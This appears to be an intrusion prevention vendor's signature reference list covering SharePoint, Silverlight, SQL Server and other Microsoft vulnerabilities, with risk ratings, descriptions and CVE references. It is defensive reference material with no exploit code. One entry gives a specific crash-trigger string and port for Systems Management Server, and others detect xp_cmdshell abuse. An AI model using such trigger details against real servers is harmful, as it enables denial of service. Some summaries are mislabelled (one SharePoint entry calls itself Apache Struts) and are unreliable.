An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the ExecuteBdcMethod method of the IRemoteExecutionService web service. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

HTTP_CS-Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227

References:

CVE-2024-38227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38227

ms24-sep
http://technet.microsoft.com/security/bulletin/ms24-sep

Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955

About this vulnerability:

A vulnerability in Microsoft Sharepoint Server

Risk:

High

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

A code injection vulnerability has been reported in Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the proxy namespace of the LobSystem object provided when creating a Business Data Connectivity Metadata Store metadata object. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

HTTP_CS-Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955

References:

CVE-2023-24955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24955

ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may

Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows Sharepoint Services

Risk:

Moderate

First detected in:

sgpkg-ips-317-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Malfunction

Description:

A denial of service vulnerability exists in Microsoft Office SharePoint. The flaw is due to the way that the affected product handles maliciously crafted requests sent to the Help.aspx page. A remote attacker can exploit this vulnerability to cause a denial of service condition by sending consecutive number of requests. Successful exploitation would cause the Microsoft Office SharePoint server to become unresponsive until an administrator manually restarts the application pool, and thus causing a denial of service condition.

Situation:

HTTP_CSU-Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service

References:

CVE-2010-1264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1264

BID-40559
http://www.securityfocus.com/bid/40559

MS10-039
http://technet.microsoft.com/security/bulletin/MS10-039

Microsoft-SharePoint-Server-RCE-CVE-2021-1707

About this vulnerability:

A vulnerability in Microsoft SharePoint

Risk:

Moderate

First detected in:

sgpkg-ips-1312-5242

Last changed:

sgpkg-ips-1312-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

A remote code execution vulnerability exists in the Microsoft SharePoint Server. A user with privileges can create a site and remotely execute code within the kernel.

Situation:

File-TextId_Microsoft-SharePoint-Server-RCE-CVE-2021-1707

References:

CVE-2021-1707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1707

ms21-jan
http://technet.microsoft.com/security/bulletin/ms21-jan

Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Sharepoint detected

Risk:

High

First detected in:

sgpkg-ips-1835-5242

Last changed:

sgpkg-ips-1835-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

Microsoft SharePoint server remote code execution vulnerability CVE-2021-26420.

Situation:

File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420

References:

CVE-2021-26420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26420

Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Sharepoint detected

Risk:

High

First detected in:

sgpkg-ips-1835-5242

Last changed:

sgpkg-ips-1835-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

Microsoft SharePoint server remote code execution vulnerability CVE-2025-21400.

Situation:

File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400

References:

CVE-2025-21400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21400

ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb

Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Office SharePoint Server detected

Risk:

High

First detected in:

sgpkg-ips-1864-5242

Last changed:

sgpkg-ips-1864-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

Microsoft Sharepoint server's remote code execution vulnerability CVE-2025-29794.

Situation:

File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794

References:

CVE-2025-29794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29794

ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr

Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft SharePoint Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1232-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

Improper sanitization of requests causes a cross-site scripting vulnerability in Microsoft Sharepoint. A successful exploit allows an attacker to inject and execute arbitratry script code in users' browsers.

Situation:

HTTP_CRL-Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting

References:

CVE-2020-0693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0693

Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection

About this vulnerability:

A vulnerability in Microsoft Sharepoint Server

Risk:

High

First detected in:

sgpkg-ips-1821-5242

Last changed:

sgpkg-ips-1821-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the Subscribe method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

HTTP_CS-Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection

References:

CVE-2024-38094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38094

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Sharepoint detected

Risk:

High

First detected in:

sgpkg-ips-1726-5242

Last changed:

sgpkg-ips-1737-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An unsafe deserialization issue has been identified in Microsoft SharePoint server. This vulnerability can allow an authenticated user to execute arbitrary code on the server.

Situation:

HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044
HTTP_CS-Microsoft-Sharepoint-Server-Potential-Unsafe-Deserialization

References:

CVE-2024-30044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30044

ms24-may
http://technet.microsoft.com/security/bulletin/ms24-may

Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023

About this vulnerability:

A vulnerability in Microsoft Sharepoint Server

Risk:

High

First detected in:

sgpkg-ips-1758-5242

Last changed:

sgpkg-ips-1810-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the FindFiltered method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023

References:

CVE-2024-38023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38023

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38024

About this vulnerability:

A vulnerability in Microsoft Sharepoint Server

Risk:

High

First detected in:

sgpkg-ips-1756-5242

Last changed:

sgpkg-ips-1810-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the FindSpecific method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

HTTP_CS-Microsoft-Sharepoint-Server-Potential-Unsafe-Deserialization

References:

CVE-2024-38024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38024

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Microsoft-SharePoint-Server-Web-Parts-RCE

About this vulnerability:

A vulnerability in Microsoft SharePoint Server

Risk:

High

First detected in:

sgpkg-ips-1265-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Input Validation

Description:

There exists a vulnerability Microsoft SharePoint Server, multiple versions, which allows remote attackers to execute code by sending a specially crafted Web Part, due to the insufficient validation of the "ObjectDataSource" control by the function AllowControl().

Situation:

HTTP_CS-Microsoft-SharePoint-Server-Web-Parts-RCE

References:

CVE-2020-1181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1181

Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Office SharePoint Server

Risk:

Moderate

First detected in:

sgpkg-ips-463-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server 2010

Type:

Input Validation

Description:

A cross-site scripting (XSS) vulnerability has been reported in Microsoft SharePoint. The vulnerability is due to a lack of sanitization of usernames. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful attack may result in the execution of script code in the target user's browser, or the execution of SharePoint commands against a SharePoint server (Cross-site request forgery).

Situation:

File-Text_Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting

References:

CVE-2012-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1861

OSVDB-83647
http://www.osvdb.org/83647

MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050

Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft SharePoint Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1527-5242

Last changed:

sgpkg-ips-1527-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported for Microsoft SharePoint. This vulnerability is due to improper input validation of the SetVariableActivity XML element in the workflow markup file used to generate custom workflows. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization

References:

CVE-2022-35823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35823

ms22-sep
http://technet.microsoft.com/security/bulletin/ms22-sep

Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2

About this vulnerability:

A vulnerability in Microsoft SharePoint Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1535-5242

Last changed:

sgpkg-ips-1535-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported for Microsoft SharePoint. This vulnerability is due to improper input validation of the workflow markup file used to generate custom workflows. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2

References:

CVE-2022-38053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38053

ms22-oct
http://technet.microsoft.com/security/bulletin/ms22-oct

Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072

About this vulnerability:

A vulnerability in Microsoft SharePoint Server

Risk:

High

First detected in:

sgpkg-ips-1319-5242

Last changed:

sgpkg-ips-1319-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

There exists a XML External Entity vulnerability in Microsoft Sharepoint Server. A successful exploitation of this vulnerability may allow an authenticated attacker to read any file and execute arbitrary code.

Situation:

File-TextId_Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072

References:

CVE-2021-24072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24072

ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb

Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure

About this vulnerability:

A vulnerability in Microsoft Groove Server

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server; Microsoft Sharepoint

Type:

Input Validation

Description:

A file disclosure vulnerability has been reported in Microsoft SharePoint. The vulnerability is due to insufficient sanitation of XML by the SharePoint server. A successful attack could provide an authenticated attacker read access to arbitrary files on the SharePoint server under the security context of the affected SharePoint service.

Situation:

File-TextId_Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure

References:

CVE-2011-1892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1892

BID-49511
http://www.securityfocus.com/bid/49511

OSVDB-75381
http://www.osvdb.org/75381

MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074

Microsoft-Sharepoint-XSS-CVE-2012-0017

About this vulnerability:

A cross-site scripting vulnarability in Microsoft SharePoint

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnarability in Microsoft SharePoint

Situation:

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0017

References:

CVE-2012-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0017

MS12-011
http://technet.microsoft.com/security/bulletin/MS12-011

Microsoft-Sharepoint-XSS-CVE-2012-0144

About this vulnerability:

A cross-site scripting vulnarability in Microsoft SharePoint

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnarability in Microsoft SharePoint

Situation:

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0144

References:

CVE-2012-0144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0144

MS12-011
http://technet.microsoft.com/security/bulletin/MS12-011

Microsoft-Sharepoint-XSS-CVE-2012-0145

About this vulnerability:

A cross-site scripting vulnarability in Microsoft SharePoint

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnarability in Microsoft SharePoint

Situation:

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0145

References:

CVE-2012-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0145

MS12-011
http://technet.microsoft.com/security/bulletin/MS12-011

Microsoft-SharePoint-XSS-CVE-2012-1859

About this vulnerability:

A vulnerability in Microsoft SharePoint

Risk:

High

First detected in:

sgpkg-ips-462-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server 2010; Microsoft SharePoint Foundation; Microsoft Office Web Apps 2010

Type:

Input Validation

Description:

There is a vulnerability in Microsoft SharePoint.

Situation:

HTTP_CSU-Microsoft-SharePoint-XSS-CVE-2012-1859

References:

CVE-2012-1859
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1859

MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050

Microsoft-Sharepoint-XSS-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Office SharePoint

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Cross-site Scripting

Description:

There is a cross-site scripting (XSS) vulnerability in Microsoft SharePoint.

Situation:

HTTP_CSU-Microsoft-Sharepoint-XSS-Vulnerability

References:

CVE-2011-1893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1893

MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074

Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083

About this vulnerability:

A vulnerability in Microsoft SharePoint

Risk:

High

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Cross-site Scripting

Description:

There is a vulnerability in Microsoft SharePoint.

Situation:

HTTP_CSU-Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083

References:

CVE-2013-0083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0083

BID-58367
http://www.securityfocus.com/bid/58367

OSVDB-91150
http://www.osvdb.org/91150

MS13-024
http://technet.microsoft.com/security/bulletin/MS13-024

Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-583-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Cross-site Scripting

Description:

An XSS vulnerability in Microsoft SharePoint Server Could Allow Remote Code Execution.

Situation:

HTTP_CRL-Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754

References:

CVE-2014-1754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1754

BID-67288
http://www.securityfocus.com/bid/67288

MS14-022
http://technet.microsoft.com/security/bulletin/MS14-022

Microsoft-Silverlight-Pointer-Handling-Memory-Corruption

About this vulnerability:

Microsoft Silverlight Pointer Handling Memory Corruption

Risk:

Critical

First detected in:

sgpkg-ips-331-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Silverlight

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Microsoft Silverlight. The vulnerability is due to a flaw in the way that Microsoft Silverlight handles pointers. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page, potentially causing arbitrary code to be injected and executed on the target host. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user. Additionally, the behaviour of the target machine is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
File-Text_Microsoft-Silverlight-Pointer-Handling-Memory-Corruption

References:

CVE-2010-0019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0019

MS10-060
http://technet.microsoft.com/security/bulletin/MS10-060

Microsoft-Silverlight-Vulnerability-CVE-2016-0034

About this vulnerability:

A vulnerability in Silverlight

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Silverlight

Type:

Malfunction

Description:

A vulnerability in Silverlight.

Situation:

File-Exe_Microsoft-Silverlight-Vulnerability-CVE-2016-0034

References:

CVE-2016-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0034

MS16-006
http://technet.microsoft.com/security/bulletin/MS16-006

Microsoft-Silverlight-Writeablebitmap-Setsource-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Silverlight

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Silverlight

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Microsoft Silverlight. The vulnerability exists in the SetSource() method of the WriteableBitmap class from System.Windows.dll. By enticing a user to visit a website, an attacker can exploit this vulnerability to disclose sensitive memory information on the target system.

Situation:

File-Zip_Writeablebitmap-Setsource-Information-Disclosure
File-Exe_Writeablebitmap-Setsource-Information-Disclosure

References:

CVE-2013-3896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3896

OSVDB-98223
http://www.osvdb.org/98223

MS13-087
http://technet.microsoft.com/security/bulletin/MS13-087

Microsoft-SMTP-Server-DNS-Handling-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Low

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exchange Server 2003;Windows Server

Type:

Malfunction

Description:

There is a vulnerability in the way Microsoft SMTP server handles DNS messages. When a malformed DNS response message is received by the vulnerable software, an unchecked buffer is overrun. An attacker can exploit this vulnerability to inject and execute arbitrary code on a target system. In a simple attack case, When the vulnerability is triggered, target SMTP service will terminate with a memory access violation. By default the SMTP service is not configured to automatically restart upon a critical error, therefore resulting in a denial of service condition. In a more complicated attack case, arbitrary code execution is possible. If the attacker is successful in injecting code into the vulnerable product, the behaviour of the target will be dependent on the code. The malicious code will be executed with system privileges.

Situation:

DNS-TCP_Microsoft-SMTP-Server-DNS-Handling-Vulnerability

References:

CVE-2004-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0840

BID-11374
http://www.securityfocus.com/bid/11374

MS04-035
http://technet.microsoft.com/security/bulletin/MS04-035

Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft SQL Server

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft SQL Server.

Situation:

HTTP_SS-Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
File-Binary_Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption

References:

CVE-2008-0107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107

BID-30119
http://www.securityfocus.com/bid/30119

MS08-040
http://technet.microsoft.com/security/bulletin/MS08-040

Microsoft-SQL-Server-Blank-Sa-Password-Usage

About this vulnerability:	Detects the usage of a blank password on the SA account on Microsoft SQL Server.
Risk:	Moderate
First detected in:	sgpkg-ips-122-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft SQL Server
Type:	Insecure Configuration
Description:	By default, Microsoft SQL server uses a blank password on the SA account. The account can be used to act as an administrator on the SQL server, and to gain administrative privileges on the host.
Situation:	MSSQL_Microsoft-SQL-Server-Blank-Sa-Password-Usage

Microsoft-SQL-Server-Payload-Execution

About this vulnerability:

A Microsoft SQL Server Payload Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server

Type:

Configuration Error

Description:

A vulnerability in Microsoft SQL Server, version 7.0, which allows remote attackers to utilize PowerShell to transmit and execute payloads.

Situation:

Generic_CS-Microsoft-SQL-Server-Payload-Execution

References:

CVE-2000-1209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1209

BID-1281
http://www.securityfocus.com/bid/1281

OSVDB-557
http://www.osvdb.org/557

Microsoft-SQL-Server-Reflected-XSS

About this vulnerability:

A vulnerability in Microsoft SQL Server

Risk:

High

First detected in:

sgpkg-ips-484-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 2000; Microsoft SQL Server 2005; Microsoft SQL Server 2008; Microsoft SQL Server 2012

Type:

Input Validation

Description:

There is a vulnerability in Microsoft SQL Server.

Situation:

HTTP_CRL-Microsoft-SQL-Server-Reflected-XSS

References:

CVE-2012-2552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2552

BID-55783
http://www.securityfocus.com/bid/55783

MS12-070
http://technet.microsoft.com/security/bulletin/MS12-070

Microsoft-SQL-Server-Reporting-Services-ViewState-RCE

About this vulnerability:

A vulnerability in Microsoft SQL Server

Risk:

High

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server

Type:

Input Validation

Description:

There exists a vulnerability in Microsoft SQL Server which allows remote attackers to execute arbitrary code by sending a crafted POST request with a serialized object.

Situation:

HTTP_CS-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
HTTP_CRL-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE

References:

CVE-2020-0618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0618

Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution

About this vulnerability:	Detects the usage of the xp_cmdshell command on Microsoft SQL Server
Risk:	Moderate
First detected in:	sgpkg-ips-122-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft SQL Server
Type:	Insecure Configuration
Description:	Microsoft SQL Server includes the command xp_cmdshell, an extended stored procedure that allows users to issue arbitrary operating system commands directly to the Windows command shell. The procedure can be used normally, but is also commonly used in exploits targetting the Microsoft SQL Server.
Situation:	Generic_CS-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution HTTP_CRL-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution SMB-TCP_Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution MSSQL_Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution

Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File-BOF

About this vulnerability:

Buffer overflow vulnerability in Microsoft Step-by-Step Interactive Training

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Step-by-Step Interactive Training

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Microsoft Step-by-Step Interactive Training. By delivering a malicious bookmark link file to a target user who opens the file with a vulnerable version of the affected product, a remote attacker may cause a denial of service terminating the affected application or execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_Malicious-Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File
File-TextId_Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link

References:

CVE-2006-3448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3448

BID-22484
http://www.securityfocus.com/bid/22484

OSVDB-31883
http://www.osvdb.org/31883

MS07-005
http://technet.microsoft.com/security/bulletin/MS07-005

Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Systems Management Server

Risk:

Moderate

First detected in:

sgpkg-ips-478-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Systems Management Server

Type:

Cross-site Scripting

Description:

Microsoft System Center Configuration Manager contains a reflected cross site scripting vulnerability. The vulnerability is due to insufficient input validation when handling a specially crafted request. An attacker could exploit this vulnerability by enticing a user to click a link or visit a page containing script code. Successful exploitation could result in attacker controlled code being reflected back and executed in the browser context of the target user.

Situation:

HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting

References:

CVE-2012-2536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2536

BID-55430
http://www.securityfocus.com/bid/55430

OSVDB-85316
http://www.osvdb.org/85316

MS12-062
http://technet.microsoft.com/security/bulletin/MS12-062

Microsoft-System-Center-Configuration-Manager-Vulnerability

About this vulnerability:

A vulnerability in Microsoft System Center Configuration Manager

Risk:

High

First detected in:

sgpkg-ips-476-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft System Center Configuration Manager

Type:

Malfunction

Description:

There is a vulnerability in Microsoft System Center Configuration Manager.

Situation:

HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Vulnerability

References:

CVE-2012-2536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2536

BID-55430
http://www.securityfocus.com/bid/55430

MS12-062
http://technet.microsoft.com/security/bulletin/MS12-062

Microsoft-Systems-Management-Server-DoS

About this vulnerability:

Denial of Service vulnerability in Microsoft SMS

Risk:

Moderate

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Systems Management Server

Type:

Buffer Overflow

Description:

The Microsoft Systems Management Server (SMS) suffers from a buffer overflow vulnerability. The vulnerability can be exploited by sending a packet containing 'RCH0####RCHE' and additional 130 characters to the server's port 2701 or 2702, which may crash the server.

Situation:

Generic_Microsoft-Systems-Management-Server-DoS

References:

CVE-2004-0728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0728

BID-10726
http://www.securityfocus.com/bid/10726

Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-697-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a use after free vulnerability in Microsoft Tablet Input Band. An exploitation can lead to arbitrary code execution.

Situation:

File-Text_Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free

References:

CVE-2015-2548
